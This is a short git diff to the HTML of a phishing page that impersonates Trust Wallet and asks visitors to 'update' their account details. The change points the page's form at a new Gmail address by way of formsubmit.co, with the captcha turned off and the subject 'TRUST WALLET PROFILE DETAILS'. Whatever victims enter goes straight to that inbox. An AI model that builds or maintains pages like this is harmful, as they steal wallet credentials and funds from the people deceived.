--- a/index.html
+++ b/index.html
@@ -62,7 +62,7 @@ input[type=submit] {
  <div class="row">
       <h3>UPDATE YOUR TRUST WALLET </h3>
 <p>Update your informations To secure Your account</p>  
-          <form action="https://formsubmit.co/instagram1.reset@gmail.com" method="POST">
+          <form action="https://formsubmit.co/user.help.trustwallet@gmail.com" method="POST">
    <input type="hidden" name="_captcha" value="false">
                 <input type="hidden" name="_subject" value="TRUST WALLET PROFILE DETAILS!!!!">
                 		
